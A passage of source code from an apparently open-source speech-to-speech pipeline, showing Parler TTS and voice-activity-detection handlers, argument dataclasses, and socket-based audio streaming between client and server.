462
+ from parler_tts import ParlerTTSForConditionalGeneration, ParlerTTSStreamer
463
+ import librosa
464
+ import logging
465
+ from rich.console import Console
466
+ from utils.utils import next_power_of_2
467
+ from transformers.utils.import_utils import is_flash_attn_2_available
468
+ torch._inductor.config.fx_graph_cache = True
469
+ torch._dynamo.config.cache_size_limit = 15
470
+ logger = logging.getLogger(__name__)
471
+ console = Console()
472
+ if not is_flash_attn_2_available() and torch.cuda.is_available():
473
+ logger.warn('Parler TTS works best with flash attention 2, but is not installed\n Given that CUDA is available in this system, you can install flash attention 2 with `uv pip install flash-attn --no-build-isolation`')
474
+
475
+ class ParlerTTSHandler(BaseHandler):
476
+
477
+ def setup(self, should_listen, model_name='ylacombe/parler-tts-mini-jenny-30H', device='cuda', torch_dtype='float16', compile_mode=None, gen_kwargs={}, max_prompt_pad_length=8, description='A female speaker with a slightly low-pitched voice delivers her words quite expressively, in a very confined sounding environment with clear audio quality. She speaks very fast.', play_steps_s=1, blocksize=512):
478
+ self.should_listen = should_listen
479
+ self.device = device
480
+ self.torch_dtype = getattr(torch, torch_dtype)
481
+ self.gen_kwargs = gen_kwargs
482
+ self.compile_mode = compile_mode
483
+ self.max_prompt_pad_length = max_prompt_pad_length
484
+ self.description = description
485
+ self.description_tokenizer = AutoTokenizer.from_pretrained(model_name)
486
+ self.prompt_tokenizer = AutoTokenizer.from_pretrained(model_name)
487
+ self.model = ParlerTTSForConditionalGeneration.from_pretrained(model_name, torch_dtype=self.torch_dtype).to(device)
488
+ framerate = self.model.audio_encoder.config.frame_rate
489
+ self.play_steps = int(framerate * play_steps_s)
490
+ self.blocksize = blocksize
491
+ if self.compile_mode not in (None, 'default'):
492
+ logger.warning("Torch compilation modes that captures CUDA graphs are not yet compatible with the STT part. Reverting to 'default'")
493
+ self.compile_mode = 'default'
494
+ if self.compile_mode:
495
+ self.model.generation_config.cache_implementation = 'static'
496
+ self.model.forward = torch.compile(self.model.forward, mode=self.compile_mode, fullgraph=True)
497
+ self.warmup()
498
+
499
+ def prepare_model_inputs(self, prompt, max_length_prompt=50, pad=False):
500
+ pad_args_prompt = {'padding': 'max_length', 'max_length': max_length_prompt} if pad else {}
501
+ tokenized_description = self.description_tokenizer(self.description, return_tensors='pt')
502
+ input_ids = tokenized_description.input_ids.to(self.device)
503
+ attention_mask = tokenized_description.attention_mask.to(self.device)
504
+ tokenized_prompt = self.prompt_tokenizer(prompt, return_tensors='pt', **pad_args_prompt)
505
+ prompt_input_ids = tokenized_prompt.input_ids.to(self.device)
506
+ prompt_attention_mask = tokenized_prompt.attention_mask.to(self.device)
507
+ gen_kwargs = {'input_ids': input_ids, 'attention_mask': attention_mask, 'prompt_input_ids': prompt_input_ids, 'prompt_attention_mask': prompt_attention_mask, **self.gen_kwargs}
508
+ return gen_kwargs
509
+
510
+ def warmup(self):
511
+ logger.info(f'Warming up {self.__class__.__name__}')
512
+ if self.device == 'cuda':
513
+ start_event = torch.cuda.Event(enable_timing=True)
514
+ end_event = torch.cuda.Event(enable_timing=True)
515
+ n_steps = 1 if self.compile_mode == 'default' else 2
516
+ if self.device == 'cuda':
517
+ torch.cuda.synchronize()
518
+ start_event.record()
519
+ if self.compile_mode:
520
+ pad_lengths = [2 ** i for i in range(2, self.max_prompt_pad_length)]
521
+ for pad_length in pad_lengths[::-1]:
522
+ model_kwargs = self.prepare_model_inputs('dummy prompt', max_length_prompt=pad_length, pad=True)
523
+ for _ in range(n_steps):
524
+ _ = self.model.generate(**model_kwargs)
525
+ logger.info(f'Warmed up length {pad_length} tokens!')
526
+ else:
527
+ model_kwargs = self.prepare_model_inputs('dummy prompt')
528
+ for _ in range(n_steps):
529
+ _ = self.model.generate(**model_kwargs)
530
+ if self.device == 'cuda':
531
+ end_event.record()
532
+ torch.cuda.synchronize()
533
+ logger.info(f'{self.__class__.__name__}: warmed up! time: {start_event.elapsed_time(end_event) * 0.001:.3f} s')
534
+
535
+ def process(self, llm_sentence):
536
+ if isinstance(llm_sentence, tuple):
537
+ (llm_sentence, _) = llm_sentence
538
+ console.print(f'[green]ASSISTANT: {llm_sentence}')
539
+ nb_tokens = len(self.prompt_tokenizer(llm_sentence).input_ids)
540
+ pad_args = {}
541
+ if self.compile_mode:
542
+ pad_length = next_power_of_2(nb_tokens)
543
+ logger.debug(f'padding to {pad_length}')
544
+ pad_args['pad'] = True
545
+ pad_args['max_length_prompt'] = pad_length
546
+ tts_gen_kwargs = self.prepare_model_inputs(llm_sentence, **pad_args)
547
+ streamer = ParlerTTSStreamer(self.model, device=self.device, play_steps=self.play_steps)
548
+ tts_gen_kwargs = {'streamer': streamer, **tts_gen_kwargs}
549
+ torch.manual_seed(0)
550
+ thread = Thread(target=self.model.generate, kwargs=tts_gen_kwargs)
551
+ thread.start()
552
+ for (i, audio_chunk) in enumerate(streamer):
553
+ global pipeline_start
554
+ if i == 0 and 'pipeline_start' in globals():
555
+ logger.info(f'Time to first audio: {perf_counter() - pipeline_start:.3f}')
556
+ audio_chunk = librosa.resample(audio_chunk, orig_sr=44100, target_sr=16000)
557
+ audio_chunk = (audio_chunk * 32768).astype(np.int16)
558
+ for i in range(0, len(audio_chunk), self.blocksize):
559
+ yield np.pad(audio_chunk[i:i + self.blocksize], (0, self.blocksize - len(audio_chunk[i:i + self.blocksize])))
560
+ self.should_listen.set()
561
+
562
+ # File: speech-to-speech-main/VAD/vad_handler.py
563
+ import torchaudio
564
+ from VAD.vad_iterator import VADIterator
565
+ from baseHandler import BaseHandler
566
+ import numpy as np
567
+ import torch
568
+ from rich.console import Console
569
+ from utils.utils import int2float
570
+ from df.enhance import enhance, init_df
571
+ import logging
572
+ logger = logging.getLogger(__name__)
573
+ console = Console()
574
+
575
+ class VADHandler(BaseHandler):
576
+
577
+ def setup(self, should_listen, thresh=0.3, sample_rate=16000, min_silence_ms=1000, min_speech_ms=500, max_speech_ms=float('inf'), speech_pad_ms=30, audio_enhancement=False):
578
+ self.should_listen = should_listen
579
+ self.sample_rate = sample_rate
580
+ self.min_silence_ms = min_silence_ms
581
+ self.min_speech_ms = min_speech_ms
582
+ self.max_speech_ms = max_speech_ms
583
+ (self.model, _) = torch.hub.load('snakers4/silero-vad', 'silero_vad')
584
+ self.iterator = VADIterator(self.model, threshold=thresh, sampling_rate=sample_rate, min_silence_duration_ms=min_silence_ms, speech_pad_ms=speech_pad_ms)
585
+ self.audio_enhancement = audio_enhancement
586
+ if audio_enhancement:
587
+ (self.enhanced_model, self.df_state, _) = init_df()
588
+
589
+ def process(self, audio_chunk):
590
+ audio_int16 = np.frombuffer(audio_chunk, dtype=np.int16)
591
+ audio_float32 = int2float(audio_int16)
592
+ vad_output = self.iterator(torch.from_numpy(audio_float32))
593
+ if vad_output is not None and len(vad_output) != 0:
594
+ logger.debug('VAD: end of speech detected')
595
+ array = torch.cat(vad_output).cpu().numpy()
596
+ duration_ms = len(array) / self.sample_rate * 1000
597
+ if duration_ms < self.min_speech_ms or duration_ms > self.max_speech_ms:
598
+ logger.debug(f'audio input of duration: {len(array) / self.sample_rate}s, skipping')
599
+ else:
600
+ self.should_listen.clear()
601
+ logger.debug('Stop listening')
602
+ if self.audio_enhancement:
603
+ if self.sample_rate != self.df_state.sr():
604
+ audio_float32 = torchaudio.functional.resample(torch.from_numpy(array), orig_freq=self.sample_rate, new_freq=self.df_state.sr())
605
+ enhanced = enhance(self.enhanced_model, self.df_state, audio_float32.unsqueeze(0))
606
+ enhanced = torchaudio.functional.resample(enhanced, orig_freq=self.df_state.sr(), new_freq=self.sample_rate)
607
+ else:
608
+ enhanced = enhance(self.enhanced_model, self.df_state, audio_float32)
609
+ array = enhanced.numpy().squeeze()
610
+ yield array
611
+
612
+ @property
613
+ def min_time_to_debug(self):
614
+ return 1e-05
615
+
616
+ # File: speech-to-speech-main/VAD/vad_iterator.py
617
+ import torch
618
+
619
+ class VADIterator:
620
+
621
+ def __init__(self, model, threshold: float=0.5, sampling_rate: int=16000, min_silence_duration_ms: int=100, speech_pad_ms: int=30):
622
+ self.model = model
623
+ self.threshold = threshold
624
+ self.sampling_rate = sampling_rate
625
+ self.is_speaking = False
626
+ self.buffer = []
627
+ if sampling_rate not in [8000, 16000]:
628
+ raise ValueError('VADIterator does not support sampling rates other than [8000, 16000]')
629
+ self.min_silence_samples = sampling_rate * min_silence_duration_ms / 1000
630
+ self.speech_pad_samples = sampling_rate * speech_pad_ms / 1000
631
+ self.reset_states()
632
+
633
+ def reset_states(self):
634
+ self.model.reset_states()
635
+ self.triggered = False
636
+ self.temp_end = 0
637
+ self.current_sample = 0
638
+
639
+ @torch.no_grad()
640
+ def __call__(self, x):
641
+ if not torch.is_tensor(x):
642
+ try:
643
+ x = torch.Tensor(x)
644
+ except Exception:
645
+ raise TypeError('Audio cannot be casted to tensor. Cast it manually')
646
+ window_size_samples = len(x[0]) if x.dim() == 2 else len(x)
647
+ self.current_sample += window_size_samples
648
+ speech_prob = self.model(x, self.sampling_rate).item()
649
+ if speech_prob >= self.threshold and self.temp_end:
650
+ self.temp_end = 0
651
+ if speech_prob >= self.threshold and (not self.triggered):
652
+ self.triggered = True
653
+ return None
654
+ if speech_prob < self.threshold - 0.15 and self.triggered:
655
+ if not self.temp_end:
656
+ self.temp_end = self.current_sample
657
+ if self.current_sample - self.temp_end < self.min_silence_samples:
658
+ return None
659
+ else:
660
+ self.temp_end = 0
661
+ self.triggered = False
662
+ spoken_utterance = self.buffer
663
+ self.buffer = []
664
+ return spoken_utterance
665
+ if self.triggered:
666
+ self.buffer.append(x)
667
+ return None
668
+
669
+ # File: speech-to-speech-main/arguments_classes/chat_tts_arguments.py
670
+ from dataclasses import dataclass, field
671
+
672
+ @dataclass
673
+ class ChatTTSHandlerArguments:
674
+ chat_tts_stream: bool = field(default=True, metadata={'help': "The tts mode is stream Default is 'stream'."})
675
+ chat_tts_device: str = field(default='cuda', metadata={'help': "The device to be used for speech synthesis. Default is 'cuda'."})
676
+ chat_tts_chunk_size: int = field(default=512, metadata={'help': 'Sets the size of the audio data chunk processed per cycle, balancing playback latency and CPU load.. Default is 512。.'})
677
+
678
+ # File: speech-to-speech-main/arguments_classes/language_model_arguments.py
679
+ from dataclasses import dataclass, field
680
+
681
+ @dataclass
682
+ class LanguageModelHandlerArguments:
683
+ lm_model_name: str = field(default='HuggingFaceTB/SmolLM-360M-Instruct', metadata={'help': "The pretrained language model to use. Default is 'microsoft/Phi-3-mini-4k-instruct'."})
684
+ lm_device: str = field(default='cuda', metadata={'help': "The device type on which the model will run. Default is 'cuda' for GPU acceleration."})
685
+ lm_torch_dtype: str = field(default='float16', metadata={'help': 'The PyTorch data type for the model and input tensors. One of `float32` (full-precision), `float16` or `bfloat16` (both half-precision).'})
686
+ user_role: str = field(default='user', metadata={'help': "Role assigned to the user in the chat context. Default is 'user'."})
687
+ init_chat_role: str = field(default='system', metadata={'help': "Initial role for setting up the chat context. Default is 'system'."})
688
+ init_chat_prompt: str = field(default='You are a helpful and friendly AI assistant. You are polite, respectful, and aim to provide concise responses of less than 20 words.', metadata={'help': "The initial chat prompt to establish context for the language model. Default is 'You are a helpful AI assistant.'"})
689
+ lm_gen_max_new_tokens: int = field(default=128, metadata={'help': 'Maximum number of new tokens to generate in a single completion. Default is 128.'})
690
+ lm_gen_min_new_tokens: int = field(default=0, metadata={'help': 'Minimum number of new tokens to generate in a single completion. Default is 0.'})
691
+ lm_gen_temperature: float = field(default=0.0, metadata={'help': 'Controls the randomness of the output. Set to 0.0 for deterministic (repeatable) outputs. Default is 0.0.'})
692
+ lm_gen_do_sample: bool = field(default=False, metadata={'help': 'Whether to use sampling; set this to False for deterministic outputs. Default is False.'})
693
+ chat_size: int = field(default=2, metadata={'help': 'Number of interactions assitant-user to keep for the chat. None for no limitations.'})
694
+
695
+ # File: speech-to-speech-main/arguments_classes/melo_tts_arguments.py
696
+ from dataclasses import dataclass, field
697
+
698
+ @dataclass
699
+ class MeloTTSHandlerArguments:
700
+ melo_language: str = field(default='en', metadata={'help': "The language of the text to be synthesized. Default is 'EN_NEWEST'."})
701
+ melo_device: str = field(default='auto', metadata={'help': "The device to be used for speech synthesis. Default is 'auto'."})
702
+ melo_speaker_to_id: str = field(default='en', metadata={'help': "Mapping of speaker names to speaker IDs. Default is ['EN-Newest']."})
703
+
704
+ # File: speech-to-speech-main/arguments_classes/mlx_language_model_arguments.py
705
+ from dataclasses import dataclass, field
706
+
707
+ @dataclass
708
+ class MLXLanguageModelHandlerArguments:
709
+ mlx_lm_model_name: str = field(default='mlx-community/SmolLM-360M-Instruct', metadata={'help': "The pretrained language model to use. Default is 'microsoft/Phi-3-mini-4k-instruct'."})
710
+ mlx_lm_device: str = field(default='mps', metadata={'help': "The device type on which the model will run. Default is 'cuda' for GPU acceleration."})
711
+ mlx_lm_torch_dtype: str = field(default='float16', metadata={'help': 'The PyTorch data type for the model and input tensors. One of `float32` (full-precision), `float16` or `bfloat16` (both half-precision).'})
712
+ mlx_lm_user_role: str = field(default='user', metadata={'help': "Role assigned to the user in the chat context. Default is 'user'."})
713
+ mlx_lm_init_chat_role: str = field(default='system', metadata={'help': "Initial role for setting up the chat context. Default is 'system'."})
714
+ mlx_lm_init_chat_prompt: str = field(default='You are a helpful and friendly AI assistant. You are polite, respectful, and aim to provide concise responses of less than 20 words.', metadata={'help': "The initial chat prompt to establish context for the language model. Default is 'You are a helpful AI assistant.'"})
715
+ mlx_lm_gen_max_new_tokens: int = field(default=128, metadata={'help': 'Maximum number of new tokens to generate in a single completion. Default is 128.'})
716
+ mlx_lm_gen_temperature: float = field(default=0.0, metadata={'help': 'Controls the randomness of the output. Set to 0.0 for deterministic (repeatable) outputs. Default is 0.0.'})
717
+ mlx_lm_gen_do_sample: bool = field(default=False, metadata={'help': 'Whether to use sampling; set this to False for deterministic outputs. Default is False.'})
718
+ mlx_lm_chat_size: int = field(default=2, metadata={'help': 'Number of interactions assitant-user to keep for the chat. None for no limitations.'})
719
+
720
+ # File: speech-to-speech-main/arguments_classes/module_arguments.py
721
+ from dataclasses import dataclass, field
722
+ from typing import Optional
723
+
724
+ @dataclass
725
+ class ModuleArguments:
726
+ device: Optional[str] = field(default=None, metadata={'help': 'If specified, overrides the device for all handlers.'})
727
+ mode: Optional[str] = field(default='socket', metadata={'help': "The mode to run the pipeline in. Either 'local' or 'socket'. Default is 'socket'."})
728
+ local_mac_optimal_settings: bool = field(default=False, metadata={'help': 'If specified, sets the optimal settings for Mac OS. Hence whisper-mlx, MLX LM and MeloTTS will be used.'})
729
+ stt: Optional[str] = field(default='whisper', metadata={'help': "The STT to use. Either 'whisper', 'whisper-mlx', and 'paraformer'. Default is 'whisper'."})
730
+ llm: Optional[str] = field(default='transformers', metadata={'help': "The LLM to use. Either 'transformers' or 'mlx-lm'. Default is 'transformers'"})
731
+ tts: Optional[str] = field(default='parler', metadata={'help': "The TTS to use. Either 'parler', 'melo', or 'chatTTS'. Default is 'parler'"})
732
+ log_level: str = field(default='info', metadata={'help': 'Provide logging level. Example --log_level debug, default=warning.'})
733
+
734
+ # File: speech-to-speech-main/arguments_classes/paraformer_stt_arguments.py
735
+ from dataclasses import dataclass, field
736
+
737
+ @dataclass
738
+ class ParaformerSTTHandlerArguments:
739
+ paraformer_stt_model_name: str = field(default='paraformer-zh', metadata={'help': "The pretrained model to use. Default is 'paraformer-zh'. Can be choose from https://github.com/modelscope/FunASR"})
740
+ paraformer_stt_device: str = field(default='cuda', metadata={'help': "The device type on which the model will run. Default is 'cuda' for GPU acceleration."})
741
+
742
+ # File: speech-to-speech-main/arguments_classes/parler_tts_arguments.py
743
+ from dataclasses import dataclass, field
744
+
745
+ @dataclass
746
+ class ParlerTTSHandlerArguments:
747
+ tts_model_name: str = field(default='ylacombe/parler-tts-mini-jenny-30H', metadata={'help': "The pretrained TTS model to use. Default is 'ylacombe/parler-tts-mini-jenny-30H'."})
748
+ tts_device: str = field(default='cuda', metadata={'help': "The device type on which the model will run. Default is 'cuda' for GPU acceleration."})
749
+ tts_torch_dtype: str = field(default='float16', metadata={'help': 'The PyTorch data type for the model and input tensors. One of `float32` (full-precision), `float16` or `bfloat16` (both half-precision).'})
750
+ tts_compile_mode: str = field(default=None, metadata={'help': "Compile mode for torch compile. Either 'default', 'reduce-overhead' and 'max-autotune'. Default is None (no compilation)"})
751
+ tts_gen_min_new_tokens: int = field(default=64, metadata={'help': 'Maximum number of new tokens to generate in a single completion. Default is 10, which corresponds to ~0.1 secs'})
752
+ tts_gen_max_new_tokens: int = field(default=512, metadata={'help': 'Maximum number of new tokens to generate in a single completion. Default is 256, which corresponds to ~6 secs'})
753
+ description: str = field(default='A female speaker with a slightly low-pitched voice delivers her words quite expressively, in a very confined sounding environment with clear audio quality. She speaks very fast.', metadata={'help': "Description of the speaker's voice and speaking style to guide the TTS model."})
754
+ play_steps_s: float = field(default=1.0, metadata={'help': 'The time interval in seconds for playing back the generated speech in steps. Default is 0.5 seconds.'})
755
+ max_prompt_pad_length: int = field(default=8, metadata={'help': 'When using compilation, the prompt as to be padded to closest power of 2. This parameters sets the maximun power of 2 possible.'})
756
+
757
+ # File: speech-to-speech-main/arguments_classes/socket_receiver_arguments.py
758
+ from dataclasses import dataclass, field
759
+
760
+ @dataclass
761
+ class SocketReceiverArguments:
762
+ recv_host: str = field(default='localhost', metadata={'help': "The host IP ddress for the socket connection. Default is '0.0.0.0' which binds to all available interfaces on the host machine."})
763
+ recv_port: int = field(default=12345, metadata={'help': 'The port number on which the socket server listens. Default is 12346.'})
764
+ chunk_size: int = field(default=1024, metadata={'help': 'The size of each data chunk to be sent or received over the socket. Default is 1024 bytes.'})
765
+
766
+ # File: speech-to-speech-main/arguments_classes/socket_sender_arguments.py
767
+ from dataclasses import dataclass, field
768
+
769
+ @dataclass
770
+ class SocketSenderArguments:
771
+ send_host: str = field(default='localhost', metadata={'help': "The host IP address for the socket connection. Default is '0.0.0.0' which binds to all available interfaces on the host machine."})
772
+ send_port: int = field(default=12346, metadata={'help': 'The port number on which the socket server listens. Default is 12346.'})
773
+
774
+ # File: speech-to-speech-main/arguments_classes/vad_arguments.py
775
+ from dataclasses import dataclass, field
776
+
777
+ @dataclass
778
+ class VADHandlerArguments:
779
+ thresh: float = field(default=0.3, metadata={'help': 'The threshold value for voice activity detection (VAD). Values typically range from 0 to 1, with higher values requiring higher confidence in speech detection.'})
780
+ sample_rate: int = field(default=16000, metadata={'help': 'The sample rate of the audio in Hertz. Default is 16000 Hz, which is a common setting for voice audio.'})
781
+ min_silence_ms: int = field(default=250, metadata={'help': 'Minimum length of silence intervals to be used for segmenting speech. Measured in milliseconds. Default is 250 ms.'})
782
+ min_speech_ms: int = field(default=500, metadata={'help': 'Minimum length of speech segments to be considered valid speech. Measured in milliseconds. Default is 500 ms.'})
783
+ max_speech_ms: float = field(default=float('inf'), metadata={'help': 'Maximum length of continuous speech before forcing a split. Default is infinite, allowing for uninterrupted speech segments.'})
784
+ speech_pad_ms: int = field(default=500, metadata={'help': 'Amount of padding added to the beginning and end of detected speech segments. Measured in milliseconds. Default is 250 ms.'})
785
+ audio_enhancement: bool = field(default=False, metadata={'help': 'improves sound quality by applying techniques like noise reduction, equalization, and echo cancellation. Default is False.'})
786
+
787
+ # File: speech-to-speech-main/arguments_classes/whisper_stt_arguments.py
788
+ from dataclasses import dataclass, field
789
+ from typing import Optional
790
+
791
+ @dataclass
792
+ class WhisperSTTHandlerArguments:
793
+ stt_model_name: str = field(default='distil-whisper/distil-large-v3', metadata={'help': "The pretrained Whisper model to use. Default is 'distil-whisper/distil-large-v3'."})
794
+ stt_device: str = field(default='cuda', metadata={'help': "The device type on which the model will run. Default is 'cuda' for GPU acceleration."})
795
+ stt_torch_dtype: str = field(default='float16', metadata={'help': 'The PyTorch data type for the model and input tensors. One of `float32` (full-precision), `float16` or `bfloat16` (both half-precision).'})
796
+ stt_compile_mode: str = field(default=None, metadata={'help': "Compile mode for torch compile. Either 'default', 'reduce-overhead' and 'max-autotune'. Default is None (no compilation)"})
797
+ stt_gen_max_new_tokens: int = field(default=128, metadata={'help': 'The maximum number of new tokens to generate. Default is 128.'})
798
+ stt_gen_num_beams: int = field(default=1, metadata={'help': 'The number of beams for beam search. Default is 1, implying greedy decoding.'})
799
+ stt_gen_return_timestamps: bool = field(default=False, metadata={'help': 'Whether to return timestamps with transcriptions. Default is False.'})
800
+ stt_gen_task: str = field(default='transcribe', metadata={'help': "The task to perform, typically 'transcribe' for transcription. Default is 'transcribe'."})
801
+ language: Optional[str] = field(default='en', metadata={'help': "The language for the conversation. \n Choose between 'en' (english), 'fr' (french), 'es' (spanish), \n 'zh' (chinese), 'ko' (korean), 'ja' (japanese), or 'None'.\n If using 'auto', the language is automatically detected and can\n change during the conversation. Default is 'en'."})
802
+
803
+ # File: speech-to-speech-main/baseHandler.py
804
+ from time import perf_counter
805
+ import logging
806
+ logger = logging.getLogger(__name__)
807
+
808
+ class BaseHandler:
809
+
810
+ def __init__(self, stop_event, queue_in, queue_out, setup_args=(), setup_kwargs={}):
811
+ self.stop_event = stop_event
812
+ self.queue_in = queue_in
813
+ self.queue_out = queue_out
814
+ self.setup(*setup_args, **setup_kwargs)
815
+ self._times = []
816
+
817
+ def setup(self):
818
+ pass
819
+
820
+ def process(self):
821
+ raise NotImplementedError
822
+
823
+ def run(self):
824
+ while not self.stop_event.is_set():
825
+ input = self.queue_in.get()
826
+ if isinstance(input, bytes) and input == b'END':
827
+ logger.debug('Stopping thread')
828
+ break
829
+ start_time = perf_counter()
830
+ for output in self.process(input):
831
+ self._times.append(perf_counter() - start_time)
832
+ if self.last_time > self.min_time_to_debug:
833
+ logger.debug(f'{self.__class__.__name__}: {self.last_time: .3f} s')
834
+ self.queue_out.put(output)
835
+ start_time = perf_counter()
836
+ self.cleanup()
837
+ self.queue_out.put(b'END')
838
+
839
+ @property
840
+ def last_time(self):
841
+ return self._times[-1]
842
+
843
+ @property
844
+ def min_time_to_debug(self):
845
+ return 0.001
846
+
847
+ def cleanup(self):
848
+ pass
849
+
850
+ # File: speech-to-speech-main/connections/local_audio_streamer.py
851
+ import threading
852
+ import sounddevice as sd
853
+ import numpy as np
854
+ import time
855
+ import logging
856
+ logger = logging.getLogger(__name__)
857
+
858
+ class LocalAudioStreamer:
859
+
860
+ def __init__(self, input_queue, output_queue, list_play_chunk_size=512):
861
+ self.list_play_chunk_size = list_play_chunk_size
862
+ self.stop_event = threading.Event()
863
+ self.input_queue = input_queue
864
+ self.output_queue = output_queue
865
+
866
+ def run(self):
867
+
868
+ def callback(indata, outdata, frames, time, status):
869
+ if self.output_queue.empty():
870
+ self.input_queue.put(indata.copy())
871
+ outdata[:] = 0 * outdata
872
+ else:
873
+ outdata[:] = self.output_queue.get()[:, np.newaxis]
874
+ logger.debug('Available devices:')
875
+ logger.debug(sd.query_devices())
876
+ with sd.Stream(samplerate=16000, dtype='int16', channels=1, callback=callback, blocksize=self.list_play_chunk_size):
877
+ logger.info('Starting local audio stream')
878
+ while not self.stop_event.is_set():
879
+ time.sleep(0.001)
880
+ print('Stopping recording')
881
+
882
+ # File: speech-to-speech-main/connections/socket_receiver.py
883
+ import socket
884
+ from rich.console import Console
885
+ import logging
886
+ logger = logging.getLogger(__name__)
887
+ console = Console()
888
+
889
+ class SocketReceiver:
890
+
891
+ def __init__(self, stop_event, queue_out, should_listen, host='0.0.0.0', port=12345, chunk_size=1024):
892
+ self.stop_event = stop_event
893
+ self.queue_out = queue_out
894
+ self.should_listen = should_listen
895
+ self.chunk_size = chunk_size
896
+ self.host = host
897
+ self.port = port
898
+
899
+ def receive_full_chunk(self, conn, chunk_size):
900
+ data = b''
901
+ while len(data) < chunk_size:
902
+ packet = conn.recv(chunk_size - len(data))
903
+ if not packet:
904
+ return None
905
+ data += packet
906
+ return data
907
+
908
+ def run(self):
909
+ self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
910
+ self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
911
+ self.socket.bind((self.host, self.port))
912
+ self.socket.listen(1)
913
+ logger.info('Receiver waiting to be connected...')
914
+ (self.conn, _) = self.socket.accept()
915
+ logger.info('receiver connected')
916
+ self.should_listen.set()
917
+ while not self.stop_event.is_set():
918
+ audio_chunk = self.receive_full_chunk(self.conn, self.chunk_size)
919
+ if audio_chunk is None:
920
+ self.queue_out.put(b'END')
921
+ break
922
+ if self.should_listen.is_set():
923
+ self.queue_out.put(audio_chunk)
924
+ self.conn.close()
925
+ logger.info('Receiver closed')
926
+
927
+ # File: speech-to-speech-main/connections/socket_sender.py
928
+ import socket
929
+ from rich.console import Console
930
+ import logging
931
+ logger = logging.getLogger(__name__)
932
+ console = Console()
933
+
934
+ class SocketSender:
935
+
936
+ def __init__(self, stop_event, queue_in, host='0.0.0.0', port=12346):
937
+ self.stop_event = stop_event
938
+ self.queue_in = queue_in
939
+ self.host = host
940
+ self.port = port
941
+
942
+ def run(self):
943
+ self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
944
+ self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
945
+ self.socket.bind((self.host, self.port))
946
+ self.socket.listen(1)
947
+ logger.info('Sender waiting to be connected...')
948
+ (self.conn, _) = self.socket.accept()
949
+ logger.info('sender connected')
950
+ while not self.stop_event.is_set():
951
+ audio_chunk = self.queue_in.get()
952
+ self.conn.sendall(audio_chunk)
953
+ if isinstance(audio_chunk, bytes) and audio_chunk == b'END':
954
+ break
955
+ self.conn.close()
956
+ logger.info('Sender closed')
957
+
958
+ # File: speech-to-speech-main/listen_and_play.py
959
+ import socket
960
+ import threading
961
+ from queue import Queue
962
+ from dataclasses import dataclass, field
963
+ import sounddevice as sd
964
+ from transformers import HfArgumentParser
965
+
966
+ @dataclass
967
+ class ListenAndPlayArguments:
968
+ send_rate: int = field(default=16000, metadata={'help': 'In Hz. Default is 16000.'})
969
+ recv_rate: int = field(default=16000, metadata={'help': 'In Hz. Default is 16000.'})
970
+ list_play_chunk_size: int = field(default=1024, metadata={'help': 'The size of data chunks (in bytes). Default is 1024.'})
971
+ host: str = field(default='localhost', metadata={'help': "The hostname or IP address for listening and playing. Default is 'localhost'."})
972
+ send_port: int = field(default=12345, metadata={'help': 'The network port for sending data. Default is 12345.'})
973
+ recv_port: int = field(default=12346, metadata={'help': 'The network port for receiving data. Default is 12346.'})
974
+
975
+ def listen_and_play(send_rate=16000, recv_rate=44100, list_play_chunk_size=1024, host='localhost', send_port=12345, recv_port=12346):
976
+ send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
977
+ send_socket.connect((host, send_port))
978
+ recv_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
979
+ recv_socket.connect((host, recv_port))
980
+ print('Recording and streaming...')
981
+ stop_event = threading.Event()
982
+ recv_queue = Queue()
983
+ send_queue = Queue()
984
+
985
+ def callback_recv(outdata, frames, time, status):
986
+ if not recv_queue.empty():
987
+ data = recv_queue.get()
988
+ outdata[:len(data)] = data
989
+ outdata[len(data):] = b'\x00' * (len(outdata) - len(data))
990
+ else:
991
+ outdata[:] = b'\x00' * len(outdata)
992
+
993
+ def callback_send(indata, frames, time, status):
994
+ if recv_queue.empty():
995
+ data = bytes(indata)
996
+ send_queue.put(data)
997
+
998
+ def send(stop_event, send_queue):
999
+ while not stop_event.is_set():
1000
+ data = send_queue.get()
1001
+ send_socket.sendall(data)
1002
+
1003
+ def recv(stop_event, recv_queue):
1004
+
1005
+ def receive_full_chunk(conn, chunk_size):
1006
+ data = b''
1007
+ while len(data) < chunk_size:
1008
+ packet = conn.recv(chunk_size - len(data))
1009
+ if not packet:
1010
+ return None
1011
+ data += packet
1012
+ return data
1013
+ while not stop_event.is_set():
1014
+ data = receive_full_chunk(recv_socket, list_play_chunk_size * 2)
1015
+ if data:
1016
+ recv_queue.put(data)
1017
+ try:
1018
+ send_stream = sd.RawInputStream(samplerate=send_rate, channels=1, dtype='int16', blocksize=list_play_chunk_size, callback=callback_send)
1019
+ recv_stream = sd.RawOutputStream(samplerate=recv_rate, channels=1, dtype='int16', blocksize=list_play_chunk_size, callback=callback_recv)
1020
+ threading.Thread(target=send_stream.start).start()
1021
+ threading.Thread(target=recv_stream.start).start()
1022
+ send_thread = threading.Thread(target=send, args=(stop_event, send_queue))
1023
+ send_thread.start()
1024
+ recv_thread = threading.Thread(target=recv, args=(stop_event, recv_queue))
1025
+ recv_thread.start()
1026
+ input('Press Enter to stop...')
1027
+ except KeyboardInterrupt:
1028
+ print('Finished streaming.')
1029
+ finally:
1030
+ stop_event.set()
1031
+ recv_thread.join()
1032
+ send_thread.join()
1033
+ send_socket.close()
1034
+ recv_socket.close()
1035
+ print('Connection closed.')
1036
+ if __name__ == '__main__':
1037
+ parser = HfArgumentParser((ListenAndPlayArguments,))
1038
+ (listen_and_play_kwargs,) = parser.parse_args_into_dataclasses()
1039
+ listen_and_play(**vars(listen_and_play_kwargs))
1040
+
1041
+ # File: speech-to-speech-main/s2s_pipeline.py
1042
+ import logging
1043
+ import os
1044
+ import sys
1045
+ from copy import copy
1046
+ from pathlib import Path
1047
+ from queue import Queue
1048
+ from threading import Event
1049
+ from typing import Optional
1050
+ from sys import platform
1051
+ from VAD.vad_handler import VADHandler
1052
+ from arguments_classes.chat_tts_arguments import ChatTTSHandlerArguments
1053
+ from arguments_classes.language_model_arguments import LanguageModelHandlerArguments
1054
+ from arguments_classes.mlx_language_model_arguments import MLXLanguageModelHandlerArguments
1055
+ from arguments_classes.module_arguments import ModuleArguments
1056
+ from arguments_classes.paraformer_stt_arguments import ParaformerSTTHandlerArguments
1057
+ from arguments_classes.parler_tts_arguments import ParlerTTSHandlerArguments
1058
